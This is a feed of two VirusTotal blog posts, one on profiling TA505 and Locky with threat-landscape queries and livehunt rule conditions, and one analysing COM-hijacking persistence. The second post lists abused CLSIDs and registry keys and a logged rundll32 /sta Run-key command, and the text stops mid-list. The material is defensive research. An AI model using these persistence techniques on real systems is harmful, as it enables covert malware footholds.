tag:blogger.com,1999:blog-68716062414221739142024-03-19T09:48:48.098+01:00VirusTotal BlogVirusTotal Teamhttp://www.blogger.com/profile/07913332926596319795noreply@blogger.comBlogger231125tag:blogger.com,1999:blog-6871606241422173914.post-48394495504333831492024-03-12T18:44:00.000+01:002024-03-12T18:44:17.118+01:00Know your enemies: An approach for CTI teams<div class="interval_12"> VirusTotal’s <a href="https://assets.virustotal.com/vt-deep-dive-threat-landscape-module.pdf" target="_blank"><b>Threat Landscape</b></a> can be a valuable source of operational and tactical threat intelligence for CTI teams, for instance helping us find the latest <b>malware trends</b> used by a given Threat Actor to adjust our <b>intelligence-led security posture</b> accordingly. In this post, we will play the role of a CTI analyst working for a Singaporean financial institution.
</div>
<br />
<div class="interval_12"> As a first step, we search for threat actors that traditionally both targeted the <b>financial industry</b> and <b>Singaporean companies</b>.
</div>
<br />
<div class="central_img width_80 interval_12" style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOYfPOF1sfQMsCFRPMBClNxlkMUuRqDUJu7BHziJtU6HkPOIO30_gk1vvbq8xFAk3xzheI-Qg3nhq4xQx8jGXtxTDIpRbibFtr4UE6S5VTRL2HUno3HTNOiKOiM4ZkciKairpUmBrB8jJPniPIWQHEH-RL08KLcUjFGNrGPOglM3-0wjr1vSySxvxkPHM/s1379/kyep1.png" />
</div>
<br />
<div class="interval_12"><a href="https://attack.mitre.org/groups/G0092/" target="_blank">“<b>TA505</b>”</a> and <a href="https://attack.mitre.org/groups/G0096/" target="_blank">“<b>APT41</b>”</a> both match these requirements. For the moment let’s focus on TA505, which seems more active at the moment.
</div>
<br />
<h2 style="text-align: left;">Understanding (TA505): </h2>
<div class="interval_12">The <a href="https://www.virustotal.com/gui/threat-actor/03c80674-35f8-4fe0-be2b-226ed0fcd69f/summary" target="_blank"><b>Threat Actor</b></a> card provides details on the actor, which seems to target organizations in the financial, healthcare, retail, and hospitality sectors across Europe, Asia Pacific region, Canada, India and the United States.
</div>
<br />
<div class="central_img width_80 interval_12" style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLPvh_Z021Xb4CKQgwRFRX-0TTY-tTHqhtTUhRm0wjmY2p5WLI7yHpRgu6y5mS7adKxf6L1M4NESJpH1q3NuBeUFzPKenCLYQamRxMKN9FpZ7fO2lhlCr6386YZCCgIohG_v6j9JrWQ_ghO7kgkpETQVbKyR1VLqfdww3nImmbf2NyBAxUS3qBKdjBHRQ/s16000/kyep2.png" />
</div>
<br />
<div class="interval_12">
According to the description TA505 seems related to <b>Dridex banking trojan</b> and <b>Locky ransomware</b> activity.
</div>
<br />
<div class="interval_12">
In VirusTotal we can find <b>two categories for TTPs</b>:<br />
- The First are TTPs directly ingested from <b>MISP</b> and <b>MITRE</b>.<br />
- The second (called Toolkit TTPs) shows TTPs obtained from <b>sandbox analysis of the IOCs</b> related to a particular actor.
</div>
<br />
<div class="interval_12">
In this case, for TA505 we can find the following <b>Toolkit TTPs</b>:
</div>
<br />
<div class="central_img width_80 interval_12" style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsXor4ZlNpvzrA3SWkbEpawRbYIKZElisjfG5-pC4Ywfp_Kx9R8Uw3cZpaafbQ6L0R_bIiYKVA3IsJMudc9VEY3pEOtoJOakEgA-Xag_627pS6uyN1UfdfJmv3lD-0Ka20YbdflEPxkzs1JPQNYsgXdKs85Hogk6ET8NLeL5VOpJC1ZEfG4LaZyqXC8Qg/s16000/kyep3.png" />
</div>
<br />
<div class="interval_12">The <b>T1486</b> tactic <b>(‘Data Encrypted technique for Impact')</b> seems potentially related to the use of <b>ransomware</b>, such as <b>Locky</b>, by this actor. This seems like a good point for us to retrieve some fresh data and understand this actor’s recent activity. For instance, the following query provide <b>fresh samples</b> from the actor (samples submitted after January 1st, 2024) that use data encryption, and tagged as ransom by AVs:
</div>
<br />
<div class="my-yara-code interval_12" style="text-align: center;"><a href="https://www.virustotal.com/gui/search/attack_technique%253AT1486%2520threat_actor%253ATA505%2520ls%253A2024-01-01%252B%2520engines%253Aransom/files" target="_blank">attack_technique:T1486 threat_actor:TA505 ls:2024-01-01+ engines:ransom</a></div>
<br />
<div class="central_img width_80 interval_12" style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIQeMWoIypq_2ootb1FVClD_5_9S0nlIexg50yzpY3n3LRgO8Ftki0R_y9alhKe4BEApxBErdPmDyTZZzoEhjlydfHGvPOgLbqeLp8mvKVLmsl5C6AY-E2t3UK-D_Jue33gBLtGzg5bEhyo-eKip2G4nGpYLzNlZh43kcS4mHus8m6MuD6_QSiaDpUzMQ/s16000/kyep4.png" />
</div>
<br />
<div class="interval_12">Multiple of the returned samples belong to the “locky” Collection <b>tagged as ‘locky’</b>, which contains <b>510 files</b> at the moment.
</div>
<br />
<div class="central_img width_80 interval_12" style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMADkBylU3Ua5_WIyPUatBioi5GrWhyQbiGRGXiyKOoJvdIHERuvpquxnCVMjOGXuCPp-JZq-K6i3vxqie5Z6RlfvfYFL9fscnqPjlAzPSHLQmvqfUgWDgg3mGXHfWAqjcyJO-WC0t8WaEEGoFEFv0NpFbs7ycoWeOncv7aWTjNvgkFQDGWRQQcHeIMEU/s16000/kyep5.png" />
</div>
<br />
<div class="interval_12">The <b>Telemetry tab</b> provides information about <b>submissions</b> and <b>lookups</b>, which helps us understand malware family’s distribution and timeframes of operations.
</div>
<br />
<div class="central_img width_80 interval_12" style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDWIpq2eU-Fmk0Twg67amSaq_GYrt4iQY8TLkmVcj2Yw8XARxapIqQBybRYmBllJXbkQj27zsiKPwVdXioxlWzajs9m7RxrCY-mmD6XqMp4TI1WCwRHmt6V43QLeXFBS2MfmeU_bSm7GUZbtXdOHsBArdFzSl4OpcvCl00ZR6nXC4UF7peVm9jsZv1sDM/s16000/kyep6.png" />
</div>
<br />
<h2 style="text-align: left;">Tailoring defenses:
</h2>
<div class="interval_12">In addition, the Collection’s <b>Rules</b> panel provides details on crowdsourced <b>Yara</b>, <b>sigma</b> and <b>IDS rules</b> that match different indicators files in this collection.
</div>
<br />
<div class="central_img width_80 interval_12" style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2-cDcNE2XuSnFVnC5uC8aTD7SMr7leJvBpMBYG3iFopbx3QZqc15N8c1sSKqEjl_tIwnUSAvzhtuCJ7fJjtnrrGxuFITgUFffSMjqIBU3UF-C0wgJ5nHKGM3S-y9n9Lgsrnt9p0x8qaAlymMNmSANW2gkBrQ5ZRqui3EKobK6AUq6YR8QLY8wnTiFLhg/s16000/kyep7.png" />
</div>
<br />
<div class="interval_12">In this case, the “<b>win_locky_auto</b>” yara rule matches almost all the files in this collection (505/510). This could help to enhance detection capabilities for this threat.
</div>
<br />
<div class="interval_12">Collection’s <b>commonalities</b> refer to characteristics, behaviors, or technical attributes shared by a set of indicators, which helps to identify patterns. Let’s use this to create a new “<b>Livehunt rule</b>” to track this activity in the future. We will use only recent samples, we can filter them in the IOCS tab (“fs:180d+”):
</div>
<br />
<div class="central_img width_80 interval_12" style="text-align: center;">
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjp6zsOoykB_WZIyIsTdIadYqnQkbECnAjwMN0o2blQv3q01Cbo5vMiKYeTtnR-_T1opy5lxAyvkARZBCadq_z_lJQIu__8STHtuCpYHTB11owibRlERVtxznts-A3WGpHevh36Ec1BLxHtG9oJVdxuwYB30kcmdOZ74HnuMeyb0lYr1C2rzIUDJ8o2SI/s16000/kyep8.png" />
</div>
<br />
<div class="interval_12">Based on commonalities results, some <b>useful information</b> to create the livehunt rule may include:</div>
<br />
<div class="interval_12"><u><b>Metadata</b></u>:
<ul>
<li><b>File type</b>: EXE and DLL formats. <br /><span style="font-size: 8pt;">(vt.metadata.file_type == vt.FileType.PE_DLL or vt.metadata.file_type == vt.FileType.PE_EXE)</span></li>
<li><b>File size</b>: Less than 1Mb.<br /><span style="font-size: 8pt;">(vt.metadata.file_size < 1000000)</span></li>
<li><b>Main icon</b>: Custom and specific icon. <br /><span style="font-size: 8pt;">(vt.metadata.main_icon.dhash == "52c244c9a7a3998b")</span></li>
<li><b>Imphash</b>: Hash value calculated from PE's import table, that could be matching some locky samples.<br /><span style="font-size: 8pt;">(vt.metadata.imphash == "31553623c43827d554ad9e1b7dfa6a5a")</span></li>
</ul>
</div>
<br />
<div class="interval_12"><u><b>Behavior</b></u>:
<ul>
<li><b>Sandbox attack techniques</b>: Detect T1486 Encryption Data technique. <br /><span style="font-size: 8pt;">(for any tec in vt.behaviour.mitre_attack_techniques: (tec.id == "T1486"))</span></li>
<li><b>Command execution</b>: Identification of possible rescue note and background set.<br /><span style="font-size: 8pt;">(for any ce in vt.behaviour.command_executions: (ce icontains "\\Desktop\\*.txt" or ce icontains "\\Desktop\\*.bmp"))</span></li>
<li><b>Memory patterns</b>: Specific patterns observed in locky samples that could be reused. <br /><span style="font-size: 8pt;">(for any mem in vt.behaviour.memory_pattern_urls: (mem icontains "checkupdate" or mem icontains "userinfo.php"))</span></li>
</ul>
</div>
<br />
<div class="interval_12">Remember you can always <b>follow</b> Threat Actor and/or collections and receive <b>fresh new IOCs</b> through the IoC Stream.</div>
<br />
<h2 style="text-align: left;">Wrapping up: </h2>
<div class="interval_12">
Threat Landscape empowers CTI teams with insights for prioritizing threats, understanding threat actors and tracking their operations pivoting between <b>Threat Actors</b> <=> <b>Collections</b> <=> <b>IOCs</b>. This provides actionable details based on the technical capabilities of the malware used in these campaigns, including a set of TTPs based on sandbox detonation that we can use both for hunting and monitoring. Collections also provide “<b>Commonalities</b>” on different indicators, including which crowdsourced rules better detect them. This helps us to quickly create effective monitoring and hunting strategies for malware families and threats actors, as well as effective protections adjusted to recent campaigns and malicious activity.</div>
<br />
<div class="interval_12">
If you have any <b>suggestions</b> or want to <b>share feedback</b> please feel free to reach out <a href="https://www.virustotal.com/gui/contact-us/other" target="_blank">here</a>.
</div>
<br />
<div class="interval_12">
Happy Hunting!
</div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>
Raimundo Alcázarhttp://www.blogger.com/profile/13300156415377228655noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-54514648840159917652024-03-07T17:22:00.000+01:002024-03-07T17:22:38.102+01:00COM Objects Hijacking<div class="interval_12">The COM Hijacking <a href="https://attack.mitre.org/techniques/T1546/015/" target="_blank">technique</a> is often utilized by threat actors and various malware families to achieve both persistence and privilege escalation in target systems. It relies on manipulating <a href="https://learn.microsoft.com/en-us/windows/win32/com/the-component-object-model" target="_blank">Component Object Model</a> (COM), exploiting the core architecture of Windows that enables communication between software components, by adding a new value on a specific registry key related to the COM object itself. </div>
<div class="interval_12">We studied the usage of this technique by different malware samples to pinpoint the most exploited COM objects in 2023.
</div>
<h1 style="text-align: left;">Abused COM Objects </h1>
<div class="interval_12">We identified the most abused COM objects by samples using MITRE’s T1546.015 technique during sandbox execution. In addition to the most abused ones, we will also highlight other abused COM objects that we found interesting.
</div>
<div class="interval_12">The chart below shows the distribution of how many samples abused different COM objects for persistence:
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/h9F_1wEQn6e2aSnJXjER-y0oCTFnHMIuIlAPGbaXS7K1yDPWttnbG1eDp5wz8jWx6PEihyuhwPcLMdNA_JbgF6jRUybVK2FQTDOZFIWs3rkUSN4q6GTdrq-1mJb450-CKWKooEi1nfXMw5e-Vnhso_fPeNoka9TkBw1x5gKFxPdTNmCBqMkBRFnSZQRnciY" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12">You can find the most used COM / CLSIDs listed in the Appendix.
</div>
<h2 style="text-align: left;">Berbew</h2>
<div class="interval_12">One of the main malware families we have observed abusing COM for persistence is Padodor/Berbew. This Trojan primarily focuses on stealing credentials and exfiltrating them to remote hosts controlled by attackers. The main COM objects abused by this family are as follows:
</div>
<ul style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;">
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">{79ECA078-17FF-726B-E811-213280E5C831}</span>
</p>
</li>
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">{79FEACFF-FFCE-815E-A900-316290B5B738}</span>
</p>
</li>
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">{79FAA099-1BAE-816E-D711-115290CEE717}</span>
</p>
</li>
</ul>
<div class="interval_12">The corresponding registry entries point to the malicious DLL. However, multiple samples of this family use a second registry key for persistence, which points to this previous CLSID we described, as in the following <a href="https://www.virustotal.com/gui/file/3e2cac1e6bc16e2763be8b30e0f7f68b0c4feee17cf66f48c684dd0c6da6ebc1/behavior" target="_blank"> example </a>:
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/HOCWTX4YofORhFsq73bFupGrAYiKazOlk6-PFnfosNb2GGx5lMbCYa5cM9QWyKSEjvXPAReIPoV8d09uNZ2KHihlrb0Rojd1hRtadkT-zDluMTMKVzsD0U0lzAtzEn8VhW0wUaG3ZfHBAbP53ES1mJAJWIJg93MwvfxVmSBGRQsQTPX8vZnKE1OUmX1s-5I" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12">In this case, the registry key <mark class="my-yara-code"><mark class="red">…CLSID\{79ECA078-17FF-726B-E811-213280E5C831}\InProcServer32\(Default)</mark></mark> points to the malicious DLL <mark class="my-yara-code"><mark class="red">C:\Windows\SysWow64\Iimgdcia.dll.</mark></mark> A second registry entry <mark class="my-yara-code"><mark class="red">…Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger</mark></mark> points to the previous CLSID <mark class="my-yara-code"><mark class="red">{79ECA078-17FF-726B-E811-213280E5C831}</mark></mark> which loads the malicious DLL.</div>
<div class="interval_12">The <mark class="my-yara-code"><mark class="red">ShellServiceObjectDelayLoad</mark></mark> registry entry (part of ShellServiceObjectDelayLoad), combined with the <mark class="my-yara-code"><mark class="red"> Web Event Logger</mark></mark> subkey used here by Berbew, has frequently been utilized to initiate the loading of the genuine <mark class="my-yara-code"><mark class="red">webcheck.dll</mark></mark>. This DLL was tasked with monitoring websites within the Internet Explorer application.</div>
<div class="interval_12">The previously utilized CLSID by <mark class="my-yara-code"><mark class="red">WebCheck</mark></mark> registry key was <mark class="my-yara-code"><mark class="red">{E6FB5E20-DE35-11CF-9C87-00AA005127ED}</mark></mark> However, in certain instances today the CLSID <mark class="my-yara-code"><mark class="red">{08165EA0-E946-11CF-9C87-00AA005127ED}</mark></mark> is used. Both are responsible for loading the <mark class="my-yara-code"><mark class="red">webcheck.dll</mark></mark> DLL and are abused by malware samples.</div>
<h2 style="text-align: left;">RATs</h2>
<div class="interval_12">The CLSID <mark class="my-yara-code"><mark class="red">{89565275-A714-4a43-912E-978B935EDCCC}</mark></mark> seems to be extensively used by various RATs . This CLSID has primarily been associated with families like <a href="https://www.virustotal.com/gui/file/80f209630f179f8d8ebbd28d36efb41f10b2c6188b6bafc29e6f980eb4ce199d" target="_blank">RemcosRAT</a> and <a href="https://www.virustotal.com/gui/file/659ad130d6ecb0cd79ae244f88193b9d94dd132965592228a25f743529f12c37" target="_blank">AsyncRAT</a> in our observations. However, we've also encountered instances where <a href="https://www.virustotal.com/gui/file/13f55eff78adb823ecff46c68bcf35d69ce9a803d0b673a34fbd9f9fc3ba0c2c" target="_blank">BitRAT</a> samples have used it. Researchers at <a href="https://blog.talosintelligence.com/new-sugargh0st-rat/" target="_blank">Cisco Talos</a> found this CLSID activity associated with the SugarGh0st RAT malware.</div>
<div class="interval_12">In the majority of cases, the DLL used for persistence with this CLSID is <a href="https://www.virustotal.com/gui/file/4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379" target="_blank">dynwrapx.dll</a>. This DLL was found in the wild in a <a href="https://www.virustotal.com/gui/url/85a07bd9400dbd9b07755212a96abbb2deda48b43d8a2bacf588bd7f239a8a0e" target="_blank">GitHub repository</a>, currently unavailable, however the DLL originates from a project named <a href="https://dynwrapx.script-coding.com/dwx/pages/dynwrapx.php?lang=en" target="_blank">DynamicWrapperX</a> (first seen in VirusTotal in 2010). It executes shellcode to inject the RAT into a process.
</div>
<div class="interval_12">A similar case is CLSID <mark class="my-yara-code"><mark class="red">{26037A0E-7CBD-4FFF-9C63-56F2D0770214}</mark></mark>. The associated DLL for persistence is <a href="https://www.virustotal.com/gui/file/3b6ddc32b800a18b21a819e842cbfdd57cb065fd92cc69545e0ef29b97cfd389/details" target="_blank">dbggame.dll</a>. First uploaded to VirusTotal in 2012, this DLL is deployed by various types of <a href="https://www.virustotal.com/gui/file/ce4ca81f0c627690e0f1916ae39b08ae523631172f6e8387373b02830810525b/" target="_blank">malware</a>, including ransomware such as <a href="https://www.virustotal.com/gui/collection/malpedia_win_xiaoba" target="_blank">XiaoBa</a>.</div>
<h3 style="text-align: left;">RATs w/ vulnerabilities</h3>
<div class="interval_12">To finish with RATs that use this technique, from late December 2023 to February 2024, there were various incidents linked to the <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21412" target="_blank">CVE-2024-21412</a> vulnerability uncovered by the Trend Micro Zero Day Initiative team (<a href="https://www.zerodayinitiative.com/" target="_blank">ZDI</a>). During these events, active campaigns were distributing the <a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.darkme" target="_blank">Darkme</a> RAT. Throughout the infection process, a primary goal was to evade Microsoft Defender SmartScreen and introduce victims to the DarkMe malware.
</div>
<div class="interval_12">The TrendMicro analysis highlights that the Darkme RAT sample utilizes the CLSID <mark class="my-yara-code"><mark class="red">{74A94F46-4FC5-4426-857B-FCE9D9286279}</mark></mark> to carry out the final load of the RAT. Yet, we've noted the utilization of other CLSIDs for persistence, including <mark class="my-yara-code"><mark class="red">{D4D4D7B7-1774-4FE5-ABA8-4CC0B99452B4}</mark></mark> in this <a href="https://www.virustotal.com/gui/file/5c85a0fe230d351b35da364c797cc95557f5dcceec034eb648e1805237c7203b" target="_blank">sample</a>.
</div>
<div class="interval_12">Furthermore, to guarantee the DLL's execution, they generate a registry key employing Autorun keys. This key's objective is to initiate the CLSID using <mark class="my-yara-code"><mark class="red">rundll32.exe</mark></mark> and <mark class="my-yara-code"><mark class="red">/sta</mark></mark> parameter, which is used to load a COM object, in this case, the previous malicious COM object created.
</div>
<div class="my-yara-code interval_12">
<pre><b>EventID:</b>13
<b>EventType:</b>SetValue
<b>Details:</b>%windir%\SysWOW64\rundll32.exe /sta {D4D4D7B7-1774-4FE5-ABA8-4CC0B99452B4} "USB_Module"
<b>TargetObject:</b>HKU\S-1-5-21-575823232-3065301323-1442773979-1000\Software\Microsoft\Windows\CurrentVersion\Run\RunDllModule</pre>
</div>
<h2 style="text-align: left;">Why use one when you can use many?
</h2>
<div class="interval_12">Some samples (like <a href="https://www.virustotal.com/gui/file/0759a7a20f33e1a2e70988b91c3abc713ddb130846dcef122ae1bd7179ad39d1" target="_blank">this Sality one</a>) use multiple CLSIDs: </div>
<ul style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;">
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">{EBEB87A6-E151-4054-AB45-A6E094C5334B}</span>
</p>
</li>
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">{57477331-126E-4FC8-B430-1C6143484AA9}</span>
</p>
</li>
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">{241D7F03-9232-4024-8373-149860BE27C0}</span>
</p>
</li>
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">{C07DB6A3-34FC-4084-BE2E-76BB9203B049}</span>
</p>
</li>
</ul>
<div class="interval_12">The sample drops two different DLLs during execution, three of the registry keys point to one of <a href="https://www.virustotal.com/gui/file/259eaf1ddc9bf610d11a22413853b3d4386fc5a8412c6e602c74eb43f1a32d46/details" target="_blank">them</a>, the remaining one to <a href="https://www.virustotal.com/gui/file/5fae639451537023dac63435b819b8b8c7ef96dc2fcf768c5f43172e2bb8ab65" target="_blank">the other</a>. The sample also turns off the Windows firewall and UAC to carry out additional actions while infecting the system.
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/CgMyQFCyp8QdRzn7oDZEjeNzyRRKAGdauSqFbB8dbgPigeeiSmfM5fBd6fbKbw9yC7jduHNgsNZsWfuzQa6qfOJehvBFm2jtNPikgGzs4tfKdTMepE57mQmmawpP09rQpGoj_jE-v4pLeEOdN3e5JaGC_12FohlKpf2dFVauablqF4ThWHBqqBiJV8w389s" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<div class="interval_12">The <a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple" target="_blank">Allaple</a> worm family deploys multiple COM objects pointing to the malicious DLL during execution, like in this <a href="https://www.virustotal.com/gui/file/280466dd91b55a0543ec46cbe67c65882a6cbc3511222825c8fe00ff431435ff/" target="_blank">example</a>:
</div>
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/srr4NcbbgMs00yPDx3sji6jBvO4cZYTFrmiUTpr-RE98-A4nV0qPIAzGfP4Iu6onRyiLJknQ21ryWH2y0YQbU5vICwzVsc7DPpWF8UFpnNzyfKZ2UYGfTgvarleHGOENsAuC1-cKR16vsrxG3M7IfVmfJ4NjrxInM8HTDGLkVDQWCODlUcgOVOAtDT2yatU" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
<h2 style="text-align: left;">Adware
</h2>
<div class="interval_12">Citrio, an adware web browser designed by Catalina Group, uses in <a href="https://www.virustotal.com/gui/search/behavior_registry%253A%2522%255C%255CCatalinaGroup%255C%255CUpdate%255C%255C%2520%2522%2520p%253A5%252B/files" target="_blank">its more recent versions</a> a COM object for persistence with CLSID <mark class="my-yara-code"><mark class="red">{F4CBF20B-F634-4095-B64A-2EBCDD9E560E}</mark></mark>. It drops several harmful DLLs, one masquerades as Google Update (<mark class="my-yara-code"><mark class="red">goopdate.dll</mark></mark>), also observed as psuser.dll, that possesses the capability to establish services on the system along using a COM object for persistence.
<div class="central_img width_90 interval_12"><span id="docs-internal-guid-3c774a84-7fff-d30a-6b3b-ecab3d16414b"><div style="text-align: center;"><img height="152" src="https://lh7-us.googleusercontent.com/vmzA_B8lAkuJCNYSz0IWihUOUXtD0tCy2jsGuebDJESCgQCsCe_MMWjCyMTBCAHKSEAiGweELdegS0IuSqPlBg8I6qT8cbLx-8feKUgosuYUMDqrxjJk-RKEPlkxY9KlklQW5BiT_RDfPPWZkcVJRnM-miOK3lEo5zPHinbCb7liR96DKOWiyC4w6PzFovk" style="font-family: Arial, sans-serif; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space-collapse: preserve;" width="800" /></div></span></div>
</div>
<h1 style="text-align: left;">Common folders used to store the payloads
</h1>
<div class="interval_12">
Most malicious DLLs we saw so far are typically stored in the <mark class="my-yara-code"><mark class="red">C:\Users\<user>\AppData\Roaming\</mark></mark> directory. It's also common to create subfolders within this directory, the most frequently found include:
</div>
<ul style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;">
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; text-wrap: wrap; vertical-align: baseline;">\qmacro</span>
</p>
</li>
<li aria-level="1" dir="ltr"
style="font-family: Arial, sans-serif; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;">
<p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
